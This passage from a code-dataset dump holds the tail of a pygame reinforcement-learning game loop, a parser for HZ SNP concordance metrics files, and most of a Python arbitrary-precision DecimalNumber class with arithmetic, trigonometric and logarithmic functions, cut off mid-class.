memory----------------->\")\r\n agent.replay(batch_size)\r\n\r\n if e % 50 == 0:\r\n\r\n print('saving the model')\r\n agent.save(output_dir + \"/\" + str(e) + \".hdf5\")\r\n if e%1000 == 0 and e > 0 and display_width < 400:\r\n print(\"updating game display\")\r\n display_width += 40\r\n display_height += 40\r\n\r\n\r\n pygame.quit()\r\n\r\nGameLoop()\r\nquit()\r\n","sub_path":"final3.py","file_name":"final3.py","file_ext":"py","file_size_in_byte":14154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"158593745","text":"def parse(input_file):\n \"\"\"\n parse an hsmetrics file and return a list of record dicts\n :param input_file:\n :return: list of dicts\n \"\"\"\n ret = []\n with open(input_file, 'r') as fh:\n keys = []\n for line in fh:\n if \"VARIANTSSAMPLE\" in line:\n keys = line.strip(\"\\n\").split(\"\\t\")\n break\n\n d = None\n for line in fh:\n values = line.strip(\"\\n\").split(\"\\t\")\n if values != ['']:\n d = dict((keys[x], values[x]) for x in range(0, len(keys)))\n d = fix_values(d)\n ret.append(d)\n break\n\n return ret\n\n\ndef fix_values(d):\n \"\"\"\n cast dict values to correct type\n :param d: dict with values\n :return: dict\n \"\"\"\n int_keys = [\"TOTAL_SNPS\", \"HZ_SNP_COUNT\", \"CONCORDANT_HZ_SNP_COUNT\"]\n float_keys = [\"CONCORDANT_HZ_SNP_FRACTION\"]\n str_keys = [\"VARIANTSSAMPLE\", \"READSSAMPLE\"]\n\n for k in int_keys:\n d[k] = int(d[k])\n for k in float_keys:\n if d[k] != \"\":\n d[k] = float(d[k])\n else:\n d[k] = 0.0\n for k in str_keys:\n d[k] = str(d[k])\n return d\n\n\n#VARIANTSSAMPLE\tREADSSAMPLE\tTOTAL_SNPS\tHZ_SNP_COUNT\tCONCORDANT_HZ_SNP_COUNT\tCONCORDANT_HZ_SNP_FRACTION\n#27150N-TD1-CS1\t27150T-TD1-CS1\t2383\t1395\t1388\t0.9949820788530466\n\n","sub_path":"logconverters/hzconcordance.py","file_name":"hzconcordance.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"66362993","text":"import sys\n\nif sys.implementation.name == \"cpython\": # micropython does not include 'typing' module\n from typing import Tuple\nif sys.implementation.name == \"micropython\": # Just in case...\n pass\n\n\nclass DecimalNumber:\n \"\"\"DecimalNumber is a class for decimal floating point arithmetic with arbitrary precision.\"\"\"\n VERSION = (1, 0, 0)\n VERSION_NAME = \"v1.0.0 - August 2021\"\n DEFAULT_SCALE: int = 16\n DECIMAL_SEP: str = \".\"\n THOUSANDS_SEP: str = \",\"\n USE_THOUSANDS_SEP: bool = False\n PI_NUMBER: int = 31415926535897932384626433832795028841971693993751058209749445923078164062862089986280348253421170679\n PI_SCALE: int = 100\n E_NUMBER: int = 27182818284590452353602874713526624977572470936999595749669676277240766303535475945713821785251664274\n E_SCALE: int = 100\n LN2_NUMBER: int = 6931471805599453094172321214581765680755001343602552541206800094933936219696947156058633269964186875\n LN2_SCALE: int = 100\n _scale: int = DEFAULT_SCALE\n\n def __init__(self, number=0, decimals: int = 0) -> None:\n \"\"\"Initialization of a DecimalNumber.\n These are the possibilities:\n 1) No parameters => number = 0. Example: DecimalNumber()\n 2) An integer => number = integer. Example: DecimalNumber(1)\n 3) Two integers => number and decimals. Example: DecimalNumber(12345, 3) => Number = 12.345\n 4) One string that contains the number. 
Example: DecimalNumber(\"12.345\") => Number = 12.345\n \"\"\"\n if isinstance(number, int):\n self._is_positive: bool = (number >= 0)\n self._number: int = number if number >= 0 else -number\n if decimals >= 0:\n self._num_decimals: int = decimals\n else:\n raise DecimalNumberExceptionMathDomainError(\n \"__init__: the number of decimals must be positive\")\n self._reduce_to_scale()\n elif isinstance(number, str):\n self.copy_from(DecimalNumber._from_string(number))\n else:\n raise DecimalNumberExceptionBadInit(\n \"Only 'int' or 'str' instances are allowed for initialization\")\n\n @classmethod\n def pi(cls) -> \"DecimalNumber\":\n \"\"\"Calculation of PI using the very fast algorithm presented in the\n documentation of the module \"decimal\" of the Python Standard Library:\n https://docs.python.org/3/library/decimal.html#recipes\n \"\"\"\n # If it is precalculated\n if DecimalNumber.PI_SCALE >= DecimalNumber.get_scale():\n s: DecimalNumber = DecimalNumber(DecimalNumber.PI_NUMBER, DecimalNumber.PI_SCALE)\n else:\n # Calculates PI\n scale: int = DecimalNumber.get_scale()\n # extra digits for intermediate steps\n DecimalNumber.set_scale(scale + 4)\n lasts = DecimalNumber(0)\n t = DecimalNumber(3)\n s = DecimalNumber(3)\n n = DecimalNumber(1)\n na = DecimalNumber(0)\n d = DecimalNumber(0)\n da = DecimalNumber(24)\n eight = DecimalNumber(8)\n thirtytwo = DecimalNumber(32)\n while s != lasts:\n lasts.copy_from(s)\n n += na\n na += eight\n d += da\n da += thirtytwo\n t = (t * n) / d\n s += t\n DecimalNumber.set_scale(scale)\n # Stores the calculated PI\n DecimalNumber.PI_NUMBER = (+s)._number # + adjusts to the scale\n DecimalNumber.PI_SCALE = (+s)._num_decimals\n return +s\n\n @classmethod\n def e(cls) -> \"DecimalNumber\":\n \"\"\"Calculation of e.\n It uses the Taylor series:\n e = 1/0! + 1/1! + 1/2! + 1/3! + ... + 1/n!\n \"\"\"\n # If it is precalculated\n if DecimalNumber.E_SCALE >= DecimalNumber.get_scale():\n e: DecimalNumber = DecimalNumber(DecimalNumber.E_NUMBER, DecimalNumber.E_SCALE)\n else:\n scale: int = DecimalNumber.get_scale()\n # extra digits for intermediate steps\n DecimalNumber.set_scale(scale + 4)\n\n i = DecimalNumber(0)\n f = DecimalNumber(1)\n e = DecimalNumber(1)\n e2 = DecimalNumber(0)\n one = DecimalNumber(1)\n while e2 != e:\n e2.copy_from(e)\n i += one\t\t# counter\n f *= i\n t = one / f\n e += t\n\n DecimalNumber.set_scale(scale)\n # Stores the calculated E\n DecimalNumber.E_NUMBER = (+e)._number # + adjusts to the scale\n DecimalNumber.E_SCALE = (+e)._num_decimals\n return +e\n\n @classmethod\n def ln2(cls) -> \"DecimalNumber\":\n \"\"\"Calculation of ln(2).\n ln(2) = -ln(1/2) = -ln(1 - 1/2)\n It uses the Taylor series:\n ln(1-x) = -x -x²/2 - x³/3 ...\n ln(2) = x + x²/2 + x³/3 ... 
for x = 1/2\n \"\"\"\n # If it is precalculated\n if DecimalNumber.LN2_SCALE >= DecimalNumber.get_scale():\n e: DecimalNumber = DecimalNumber(DecimalNumber.LN2_NUMBER, DecimalNumber.LN2_SCALE)\n else:\n scale: int = DecimalNumber.get_scale()\n DecimalNumber.set_scale(scale + 4) # extra digits for intermediate steps\n\n i = DecimalNumber(0) # counter\n half = DecimalNumber(5, 1) # 0.5\n x = DecimalNumber(1)\n one = DecimalNumber(1)\n e = DecimalNumber(0)\n e2 = DecimalNumber(1)\n while e2 != e:\n e2.copy_from(e)\n i += one\n x *= half\n e += x / i\n\n DecimalNumber.set_scale(scale)\n # Stores the calculated LN2\n DecimalNumber.LN2_NUMBER = (+e)._number # + adjusts to the scale\n DecimalNumber.LN2_SCALE = (+e)._num_decimals\n return +e\n\n def exp(self, inc_scale: bool = True) -> \"DecimalNumber\":\n \"\"\"Calculates exp(n)\n Works for any x, but for speed, it should have |x| < 1.\n For an arbitrary number, to guarantee that |x| < 1, it uses:\n exp(x) = exp(x - m * log(2)) * 2 ^ m ; where m = floor(x / log(2))\n\n Scale is increased if 'inc_scale' is True.\n \"\"\"\n scale = DecimalNumber.get_scale()\n # Calculating the necessary extra scale:\n extra = (abs(self) / DecimalNumber(\"2.3\")).to_int_round() + 10\n DecimalNumber.set_scale(scale + extra)\n if abs(self) <= 1:\n r = DecimalNumber._exp_lt_1(self, inc_scale)\n else:\n m = (self / DecimalNumber.ln2()).to_int_truncate()\n r = DecimalNumber._exp_lt_1(self - m * DecimalNumber.ln2()) * (2 ** m)\n\n DecimalNumber.set_scale(scale)\n return +r\n\n @staticmethod\n def _exp_lt_1(n: \"DecimalNumber\", inc_scale: bool = True) -> \"DecimalNumber\":\n \"\"\" Auxiliary function to calculate exp(n)\n Expects |n| < 1 to converge rapidly\n \"\"\"\n if n == 1:\n e = DecimalNumber.e()\n elif n == -1:\n e = 1 / DecimalNumber.e()\n else:\n i = DecimalNumber(0)\n x = DecimalNumber(1)\n f = DecimalNumber(1)\n e = DecimalNumber(1)\n e2 = DecimalNumber(0)\n one = DecimalNumber(1)\n while e2 != e:\n e2.copy_from(e)\n i += one\t\t# counter\n x *= n\n f *= i\n t = x / f\n e += t\n\n # if inc_scale:\n # DecimalNumber.set_scale(scale)\n return +e\n\n def ln(self) -> \"DecimalNumber\":\n \"\"\"Calculates ln(n)\n Newton's method is used to solve: e**a - x = 0 ; a = ln(x)\n \"\"\"\n if self == 1:\n return DecimalNumber(0)\n if self == 0:\n raise DecimalNumberExceptionMathDomainError(\"ln(0) = -Infinite\")\n if self < 0:\n raise DecimalNumberExceptionMathDomainError(\"ln(x) exists for x > 0\")\n n = self\n scale: int = DecimalNumber.get_scale()\n\n # Estimate first value\n DecimalNumber.set_scale(10) # Low scale for this is enough\n e = DecimalNumber.e()\n y0 = DecimalNumber(0)\n y1 = DecimalNumber(1)\n one = DecimalNumber(1)\n p: DecimalNumber = e.clone()\n while p < n:\n y1 += one\n p *= e\n\n DecimalNumber.set_scale(scale) # Restores scale\n DecimalNumber.set_scale(DecimalNumber.get_scale() + 10) # extra digits for intermediate steps\n two = DecimalNumber(2)\n while y0 != y1:\n y0.copy_from(y1)\n y1 = y0 + two * ((n - y0.exp(False)) / (n + y0.exp(False)))\n\n DecimalNumber.set_scale(scale)\n return +y1\n\n def sin(self) -> \"DecimalNumber\":\n \"\"\"Calculates sin(x). x = radians\n It uses the Taylor series: sin(x) = x - x³/3! + x⁵/5! - x⁷/7! 
...\n \"\"\"\n x = self.clone()\n scale: int = DecimalNumber.get_scale()\n DecimalNumber.set_scale(scale + 4) # extra digits for intermediate steps\n\n negative_radians: bool = (x < 0)\n if negative_radians:\n x = -x\n # Calculates x mod 2π\n pi = DecimalNumber.pi()\n f: int = (x / (pi * 2)).to_int_truncate()\n if f > 0:\n x -= f * 2 * pi\n\n # Determines the quadrant and reduces the range of x to 0 - π/2\n # sin(-x) = -sin(x) ; cos(-x) = cos(x) ; tan(-x) = -tan(x) \n half_pi = pi / 2\n r = half_pi.clone()\n quadrant: int = 1\n while x > r:\n r += half_pi\n quadrant += 1\n\n if quadrant == 2:\n x = pi - x\n elif quadrant == 3:\n x = x - pi\n elif quadrant == 4:\n x = 2 * pi - x\n\n i = DecimalNumber(1) # counter\n two = DecimalNumber(2)\n n = x.clone()\n d = DecimalNumber(1)\n s = DecimalNumber(1)\n e = n.clone()\n e2 = DecimalNumber(0)\n while e2 != e:\n e2.copy_from(e)\n i += two\n n *= x * x\n d *= i * (i - 1)\n s = -s\n e += (n * s) / d\n\n if quadrant > 2:\n e = -e\n if negative_radians:\n e = -e\n\n DecimalNumber.set_scale(scale)\n return +e\n\n def cos(self) -> \"DecimalNumber\":\n \"\"\"Calculates cos(x). x = radians\n It uses the Taylor series: cos(x) = 1 - x²/2! + x⁴/4! - x⁶/6! ...\n \"\"\"\n x = self.clone()\n scale: int = DecimalNumber.get_scale()\n DecimalNumber.set_scale(scale + 4) # extra digits for intermediate steps\n\n if (x < 0): # cos(-x) = cos(x)\n x = -x\n\n # Calculates x mod 2π\n pi = DecimalNumber.pi()\n f: int = (x / (pi * 2)).to_int_truncate()\n if f > 0:\n x -= f * 2 * pi\n\n # Determines the quadrant and reduces the range of x to 0 - π/2\n half_pi = pi / 2\n r = half_pi.clone()\n quadrant: int = 1\n while x > r:\n r += half_pi\n quadrant += 1\n\n if quadrant == 2:\n x = pi - x\n elif quadrant == 3:\n x = x - pi\n elif quadrant == 4:\n x = 2 * pi - x\n\n i = DecimalNumber(1) # counter\n two = DecimalNumber(2)\n n = DecimalNumber(1)\n d = DecimalNumber(1)\n s = DecimalNumber(1)\n e = n.clone()\n e2 = DecimalNumber(0)\n while e2 != e:\n e2.copy_from(e)\n n *= x * x\n d *= i * (i + 1)\n i += two\n s = -s\n e += (n * s) / d\n\n if quadrant == 2 or quadrant == 3:\n e = -e\n\n DecimalNumber.set_scale(scale)\n return +e\n\n def tan(self) -> \"DecimalNumber\":\n \"\"\"Calculates tan(x) = sin(x) / cos(x). x = radians \"\"\"\n x = self.clone()\n\n # Calculates x mod 2π\n pi = DecimalNumber.pi()\n f: int = (x / (pi * 2)).to_int_truncate()\n if f > 0:\n x -= f * 2 * pi\n\n half_pi = pi / 2\n three_halves_pi = (3 * pi) / 2\n # Determines the quadrant\n r = half_pi.clone()\n quadrant: int = 1\n while x > r:\n r += half_pi\n quadrant += 1\n\n # tan(x) = sin(x) / cos(x) ; if cos(x) == 0 => tan(x) = ∞\n\n if self == half_pi or self == three_halves_pi:\n raise DecimalNumberExceptionDivisionByZeroError(\"tan(x) = ±Infinite\")\n else:\n scale: int = DecimalNumber.get_scale()\n DecimalNumber.set_scale(scale + 4)\n s = x.sin()\n c = x.cos()\n if c == 0:\n DecimalNumber.set_scale(scale)\n raise DecimalNumberExceptionDivisionByZeroError(\"tan(x) = ±Infinite\")\n else:\n t = s / c\n DecimalNumber.set_scale(scale)\n return +t\n\n def asin(self) -> \"DecimalNumber\":\n \"\"\"Calculates asin(x)\n It uses the Taylor series: arcsin(x) = x + x³/6 + 3x⁵/40 + 15x⁷/336 + ...\n It converges very slowly for |x| near 1. 
To avoid values near 1:\n If |n| between 0 and 0.707: arcsin(x) is calculated using the series.\n If |n| between 0.707 and 1: arcsin(x) is calculated as pi/2 - arcsin( sqrt(1 - x²) )\n This guarantees that the series is only used with x <= 0.707 ; (sqrt(1/2)).\n \"\"\"\n if self >= -1 and self <= 1:\n if self == -1:\n return -(DecimalNumber.pi() / 2)\n elif self == 1:\n return (DecimalNumber.pi() / 2)\n elif self == 0:\n return DecimalNumber(0)\n\n scale: int = DecimalNumber.get_scale()\n DecimalNumber.set_scale(DecimalNumber.get_scale() + 4) # extra digits for intermediate steps\n\n trick: bool = False\n if abs(self) > DecimalNumber(\"0.707\"):\n trick = True\n x = (1 - self * self).square_root()\n else: \n x = self.clone()\n \n i = DecimalNumber(1) # counter\n one = DecimalNumber(1)\n two = DecimalNumber(2)\n four = DecimalNumber(4)\n n = DecimalNumber(1)\n d = DecimalNumber(1)\n n2 = x.clone()\n e = x.clone()\n e2 = DecimalNumber(0)\n counter: int = 0\n while e2 != e:\n e2.copy_from(e)\n n *= i\n i += two\n d *= i - one\n n2 *= x * x\n e += (n * n2) / (d * i)\n\n if trick:\n if self._is_positive:\n e = DecimalNumber.pi() / 2 - e\n else:\n e = e - DecimalNumber.pi() / 2\n\n DecimalNumber.set_scale(scale)\n return +e\n else:\n raise DecimalNumberExceptionMathDomainError(\"asin(x) admits -1 <= x <= 1 only\")\n\n def acos(self) -> \"DecimalNumber\":\n \"\"\"Calculates acos(x)\n It uses the equivalence: acos(x) = π/2 - asin(x)\n \"\"\"\n if self >= -1 and self <= 1:\n scale: int = DecimalNumber.get_scale()\n DecimalNumber.set_scale(DecimalNumber.get_scale() + 4) # extra digits for intermediate steps\n\n a = (DecimalNumber.pi() / 2) - self.asin()\n\n DecimalNumber.set_scale(scale)\n return +a\n else:\n raise DecimalNumberExceptionMathDomainError(\"acos(x) admits -1 <= x <= 1 only\")\n\n def atan(self) -> \"DecimalNumber\":\n \"\"\"Calculates atan(x)\n It uses: atan(x) = asin( x / sqrt(1 + x²) )\n \"\"\"\n scale: int = DecimalNumber.get_scale()\n DecimalNumber.set_scale(DecimalNumber.get_scale() + 4) # extra digits for intermediate steps\n one = DecimalNumber(1)\n v = self / (one + self * self).square_root()\n a = v.asin()\n\n DecimalNumber.set_scale(scale)\n return +a\n\n\n @staticmethod\n def version() -> Tuple[int, int, int]:\n \"\"\"Returns a tuple (MAJOR, MINOR, PATCH) with the version of DecimalNumber\"\"\"\n return DecimalNumber.VERSION\n\n @staticmethod\n def version_name() -> str:\n \"\"\"Returns a string with the version of DecimalNumber\"\"\"\n return DecimalNumber.VERSION_NAME\n\n @staticmethod\n def set_scale(num_digits: int) -> None:\n \"\"\"Sets the scale.\n Scale is a class value, the maximum number of decimals that a DecimalNumber can have.\n The default value is 16. The maximum value is only limited by the available\n memory and computer power.\"\"\"\n if num_digits >= 0:\n DecimalNumber._scale = num_digits\n else:\n raise DecimalNumberExceptionMathDomainError(\n \"set_scale: scale must be positive\")\n\n @staticmethod\n def get_scale() -> int:\n \"\"\"Gets the current scale value.\"\"\"\n return DecimalNumber._scale\n\n @staticmethod\n def _parse_number(number: str) -> Tuple[bool, int, int]:\n \"\"\"This is a static and auxiliary method to parse a string containing\n a number. 
If the string is parsed as a number, it returns three values:\n True --> string correctly parsed as number.\n Integer containing all the digits of the number.\n Integer representing the number of decimals.\n For example: \"-12345.678\" will be parsed and the values returned will be:\n (True, -12345678, 3)\n If the parsing fails, it returns (False, 0, 0).\n Note: this is faster than using a regular expression. Also, with\n the regular expression \"^\\-?[0-9]+\\.?[0-9]*\", an exception was raised in\n micropython when the string \"number\" was long.\n \"\"\"\n # Parses with a small state machine; 'step' tracks the expected token.\n step: int = 1 # 1: '-', 2: [0-9], 3: '.', 4: [0-9]\n position: int = 0\n integer_number: int = 0\n is_positive: bool = True\n num_decimals: int = 0\n number = tuple(number,) # Faster than indexing the string\n length: int = len(number)\n digits: str = \"0123456789\"\n last_valid: int = 0\n while position < length:\n if step == 1:\n if number[position] == '-':\n is_positive = False\n position += 1\n step = 2\n elif step == 2:\n if digits.find(number[position]) != -1: # [0-9]+\n integer_number = integer_number * \\\n 10 + int(number[position])\n position += 1\n last_valid = position\n else:\n step = 3\n elif step == 3:\n if number[position] == DecimalNumber.DECIMAL_SEP:\n position += 1\n last_valid = position\n step = 4\n elif step == 4:\n if digits.find(number[position]) != -1: # [0-9]*\n integer_number = integer_number * \\\n 10 + int(number[position])\n num_decimals += 1\n position += 1\n last_valid = position\n else:\n break\n if last_valid == length:\n if not is_positive:\n integer_number = -integer_number\n return (True, integer_number, num_decimals)\n else:\n return (False, 0, 0)\n\n @staticmethod\n def _from_string(number: str) -> \"DecimalNumber\":\n \"\"\"Static and auxiliary method to create a DecimalNumber from a string.\"\"\"\n correct, integer_number, num_decimals = DecimalNumber._parse_number(\n number)\n if not correct:\n raise DecimalNumberExceptionParseError(\n \"Syntax error parsing '{0}'\".format(number))\n else:\n n = DecimalNumber(integer_number, num_decimals)\n return n\n\n @staticmethod\n def _make_integer_comparable(n1: \"DecimalNumber\", n2: \"DecimalNumber\") -> Tuple[int, int]:\n \"\"\"Static and auxiliary method to create two integers from two DecimalNumber instances,\n without decimals, that can be compared (or summed) by taking into account their decimals.\n Examples:\n n1: 12345.678, n2: 5.4321098 --> i1: 123456780000, i2: 54321098\n n1: 345.1, n2: 7.65: --> i1: 34510, i2: 765\n \"\"\"\n max_decimals: int = max(n1._num_decimals, n2._num_decimals)\n n1_number: int = n1._number\n if not n1._is_positive:\n n1_number = -n1_number\n n2_number: int = n2._number\n if not n2._is_positive:\n n2_number = -n2_number\n if max_decimals > n1._num_decimals:\n n1_number *= 10 ** (max_decimals - n1._num_decimals)\n if max_decimals > n2._num_decimals:\n n2_number *= 10 ** (max_decimals - n2._num_decimals)\n return (n1_number, n2_number)\n\n @staticmethod\n def _isqrt(n: int) -> int:\n \"\"\"Static and auxiliary method to calculate the square root\n of an integer.\n It uses Newton's method with integer division.\n \"\"\"\n if n < 0:\n return 0\n # Calculates initial value\n t: int = n\n x1: int = 1\n while t > 100:\n x1 *= 10\n t //= 100\n # Uses Newton's method\n x2: int = (x1 + n // x1) // 2\n while abs(x2 - x1) > 1:\n x1 = x2\n x2 = (x1 + n // x1) // 2\n return x2\n\n def clone(self) -> \"DecimalNumber\":\n \"\"\"Returns a new DecimalNumber as a clone of self.\"\"\"\n n = DecimalNumber()\n 
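# copy each internal field so the clone is fully independent of self\n 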
n._number = self._number\n n._num_decimals = self._num_decimals\n n._is_positive = self._is_positive\n return n\n\n def copy_from(self, other: \"DecimalNumber\") -> None:\n \"\"\"It copies on self other DecimalNumber.\"\"\"\n self._number = other._number\n self._num_decimals = other._num_decimals\n self._is_positive = other._is_positive\n\n def square_root(self) -> \"DecimalNumber\":\n \"\"\"Calculates the square root of a DecimalNumber.\n It converts the DecimalNumber to an integer (without decimals), calculates\n its square root using _isqrt() and then it sets the decimals.\n \"\"\"\n n = DecimalNumber()\n if not self._is_positive:\n raise DecimalNumberExceptionMathDomainError(\n \"No square root for negative numbers\")\n\n num_integer: int = self._number\n num_integer *= (10 ** (DecimalNumber.get_scale() * 2))\n additional_decimals: int = 0\n if (self._num_decimals % 2) == 1:\n num_integer *= 10\n additional_decimals = 1\n\n num_integer = DecimalNumber._isqrt(num_integer)\n n._number = num_integer\n n._num_decimals = (\n (self._num_decimals + additional_decimals) // 2) + DecimalNumber.get_scale()\n n._reduce_to_scale()\n return n\n\n def __add__(self, other: \"DecimalNumber\") -> \"DecimalNumber\":\n \"\"\"Adds two DecimalNumber.\n Returns (self + other)\n \"\"\"\n if isinstance(other, int):\n other = DecimalNumber(other)\n\n # 123 + 456 : 123\n # : 456\n # : 579\n # 123 + 4.56 : 123 0\n # : 4 56\n # : 127 56 --> 127 + Apply 2 decimals to 56 --> 0.56\n # 123 + 0.0456 : 123 0\n # : 0 456\n # : 123 456 --> 123 + Apply 4 decimals to 456 --> 0.0456\n # 123.723 + 4.56 : 123 723\n # : 4 560 --> Apply 3 decimals to 56 --> 560\n # : 127 1283 --> 127 + Apply 3 decimals to 1283 --> 0.283 --> Add 1 to 127 --> 128\n # 0.0123 + 0.56 : 0 123\n # : 0 56 --> Apply 4 decimals to 56 --> 5600\n # : 0 5723 --> 123 + 5600\n\n max_decimals: int = max(self._num_decimals, other._num_decimals)\n\n a_factor: int = 10 ** self._num_decimals\n b_factor: int = 10 ** other._num_decimals\n\n a_integer: int = self._number // a_factor\n a_decimals: int = self._number % a_factor\n b_integer: int = other._number // b_factor\n b_decimals: int = other._number % b_factor\n\n if self._num_decimals < max_decimals:\n a_decimals *= (10 ** (max_decimals - self._num_decimals))\n\n if other._num_decimals < max_decimals:\n b_decimals *= (10 ** (max_decimals - other._num_decimals))\n\n c_factor: int = max(a_factor, b_factor)\n a_all: int = a_integer * c_factor + a_decimals\n b_all: int = b_integer * c_factor + b_decimals\n\n c_all: int = (a_all if self._is_positive else -a_all) + (b_all if other._is_positive else -b_all)\n c_is_positive: bool = (c_all > 0)\n if c_all < 0:\n c_all = -c_all\n\n new_number = DecimalNumber(c_all, max_decimals)\n new_number._is_positive = c_is_positive\n\n new_number._reduce_to_scale()\n\n return new_number\n\n def __iadd__(self, other: \"DecimalNumber\") -> \"DecimalNumber\":\n \"\"\"Adds a DecimalNumber to itself.\n Returns (self += other)\n \"\"\"\n n = self.__add__(other)\n self._number = n._number\n self._num_decimals = n._num_decimals\n self._is_positive = n._is_positive\n return self\n\n def __radd__(self, other: int) -> \"DecimalNumber\":\n \"\"\"Reverse add.\n It is called for (integer + DecimalNumber).\n At this moment, micropython does not support it.\n \"\"\"\n return self.__add__(DecimalNumber(other))\n\n def __sub__(self, other: \"DecimalNumber\") -> \"DecimalNumber\":\n if isinstance(other, int):\n other = DecimalNumber(other)\n s = other.clone()\n s._is_positive = not s._is_positive\n 
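# subtraction reuses addition: a - b is evaluated as a + (-b)\n 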
return self.__add__(s)\n\n def __isub__(self, other: \"DecimalNumber\") -> \"DecimalNumber\":\n n = self.__sub__(other)\n self._number = n._number\n self._num_decimals = n._num_decimals\n self._is_positive = n._is_positive\n return self\n\n def __rsub__(self, other: int) -> \"DecimalNumber\":\n return DecimalNumber(other).__sub__(self)\n\n def __mul__(self, other: \"DecimalNumber\") -> \"DecimalNumber\":\n if isinstance(other, int):\n other = DecimalNumber(other)\n a_integer: int = self._number if self._is_positive else -self._number\n b_integer: int = other._number if other._is_positive else -other._number\n c_integer: int = a_integer * b_integer\n new_number = DecimalNumber(\n c_integer, self._num_decimals + other._num_decimals)\n return new_number\n\n def __imul__(self, other: \"DecimalNumber\") -> \"DecimalNumber\":\n n = self.__mul__(other)\n self._number = n._number\n self._num_decimals = n._num_decimals\n self._is_positive = n._is_positive\n return self\n\n def __rmul__(self, other: int) -> \"DecimalNumber\":\n return self.__mul__(DecimalNumber(other))\n\n def __truediv__(self, other: \"DecimalNumber\") -> \"DecimalNumber\":\n if isinstance(other, int):\n other = DecimalNumber(other)\n # a_integer: int = self._number if self._is_positive else -self._number\n # b_integer: int = other._number if other._is_positive else -other._number\n a_integer: int\n b_integer: int\n a_integer, b_integer = DecimalNumber._make_integer_comparable(self, other)\n if b_integer != 0:\n c_factor: int = 10 ** (DecimalNumber.get_scale() + 2)\n c_integer: int = (a_integer * c_factor) // b_integer\n new_number = DecimalNumber(\n c_integer, (DecimalNumber.get_scale() + 2))\n else:\n raise DecimalNumberExceptionDivisionByZeroError(\"Division by zero\")\n return new_number\n\n def __itruediv__(self, other: \"DecimalNumber\") -> \"DecimalNumber\":\n n = self.__truediv__(other)\n self._number = n._number\n self._num_decimals = n._num_decimals\n self._is_positive = n._is_positive\n return self\n\n def __rtruediv__(self, other: int) -> \"DecimalNumber\":\n return DecimalNumber(other).__truediv__(self)\n\n def __pow__(self, other: int) -> \"DecimalNumber\":\n # Exponentiation by squaring: https://en.wikipedia.org/wiki/Exponentiation_by_squaring\n e: int = other\n x = self.clone()\n x._is_positive = True\n if other == 0:\n return DecimalNumber(1)\n scale: int = DecimalNumber.get_scale()\n \n # Calculating the necessary extra scale:\n extra = abs(other) * (len(str(self._number)) - self._num_decimals)\n # extra digits for intermediate steps\n DecimalNumber.set_scale(scale + extra)\n if other < 0:\n x = DecimalNumber(1) / x\n other = -other\n y = DecimalNumber(1)\n while other > 1:\n if (other % 2) == 0:\n x *= x\n other //= 2\n else:\n y *= x\n x *= x\n other = (other - 1) // 2\n x *= y\n DecimalNumber.set_scale(scale)\n if not self._is_positive and (e % 2) == 1:\n return -x\n else:\n return +x\n\n def __neg__(self) -> \"DecimalNumber\":\n n = self.clone()\n n._is_positive = not self._is_positive\n n._reduce_to_scale()\n return n\n\n def __pos__(self) -> \"DecimalNumber\":\n n = self.clone()\n n._reduce_to_scale()\n return n\n\n def __abs__(self) -> \"DecimalNumber\":\n n = self.clone()\n n._is_positive = True\n n._reduce_to_scale()\n return n\n\n def __lt__(self, other: \"DecimalNumber\") -> bool: # Less than\n if isinstance(other, int):\n other = DecimalNumber(other)\n n1, n2 = DecimalNumber._make_integer_comparable(self, other)\n return (n1 < n2)\n\n def __le__(self, other: \"DecimalNumber\") -> bool: # Less than or 
equal to\n if isinstance(other, int):\n other = DecimalNumber(other)\n n1, n2 = DecimalNumber._make_integer_comparable(self, other)\n return (n1 <= n2)\n\n def __eq__(self, other: \"DecimalNumber\") -> bool: # Equal to\n if isinstance(other, int):\n other = DecimalNumber(other)\n n1, n2 = DecimalNumber._make_integer_comparable(self, other)\n return (n1 == n2)\n\n def __ne__(self, other: \"DecimalNumber\") -> bool: # Not equal to\n if isinstance(other, int):\n other = DecimalNumber(other)\n n1, n2 = DecimalNumber._make_integer_comparable(self, other)\n return (n1 != n2)\n\n def __gt__(self, other: \"DecimalNumber\") -> bool: # Greater than\n if isinstance(other, int):\n other = DecimalNumber(other)\n n1, n2 = DecimalNumber._make_integer_comparable(self, other)\n return (n1 > n2)\n\n def __ge__(self, other: \"DecimalNumber\") -> bool: # Greater than or equal to\n if isinstance(other, int):\n other = DecimalNumber(other)\n n1, n2 = DecimalNumber._make_integer_comparable(self, other)\n return (n1 >= n2)\n\n def __str__(self, thousands: bool = False) -> str:\n # Integer / Decimals: String\n # 12345 / 0: 12345\n # 12345 / 1: 1234.5\n # 12345 / 2: 123.45\n # 12345 / 3: 12.345\n # 12345 / 4: 1.2345\n # 12345 / 5: 0.12345\n # 12345 / 6: 0.012345\n # 12345 / 7: 0.0012345\n # 12345 / 8: 0.00012345\n str_number: str = str(\n self._number) if self._number >= 0 else str(-self._number)\n if self._num_decimals != 0:\n num_digits: int = len(str_number)\n if self._num_decimals < num_digits:\n str_number = str_number[:(\n num_digits - self._num_decimals)] + \".\" + str_number[-self._num_decimals:]\n else:\n str_number = \"0\" + \".\" + \\\n (\"0\" * (self._num_decimals - num_digits)) + str_number\n\n if thousands:\n pos_decimal: int = str_number.find(\".\")\n if pos_decimal == -1:\n first_part: str = str_number\n second_part: str = \"\"\n else:\n first_part: str = str_number[:pos_decimal]\n second_part: str = str_number[pos_decimal + 1:]\n first_part = \"{:,d}\".format(int(first_part))\n ##### Commenting this part to not separate decimals ###############################\n # if len(second_part) > 0:\n # # Note: reversing with second_part[::-1] is not available for micropython\n # second_part = \"{:,d}\".format(int( ''.join(reversed(second_part)) ))\n # second_part = ''.join(reversed(second_part))\n ###################################################################################\n str_number = first_part\n if len(second_part) > 0:\n str_number += \".\" + second_part\n\n str_number = str_number.replace(\".\", \"#\")\n str_number = str_number.replace(\",\", DecimalNumber.THOUSANDS_SEP)\n str_number = str_number.replace(\"#\", DecimalNumber.DECIMAL_SEP)\n\n if not self._is_positive:\n str_number = \"-\" + str_number\n\n return str_number\n\n def __repr__(self) -> str:\n return 'DecimalNumber(\"' + str(self) + '\")'\n\n def to_int_truncate(self) -> int:\n return self._number // (10 ** self._num_decimals)\n\n def to_int_round(self) -> int:\n n = self.clone()\n s = DecimalNumber.get_scale()\n DecimalNumber.set_scale(0)\n n._reduce_to_scale()\n DecimalNumber.set_scale(s)\n return n._number\n\n def to_string_thousands(self) -> str:\n return self.__str__(True)\n\n # Returns a string representing the number limited to N characters, including '.', '-' 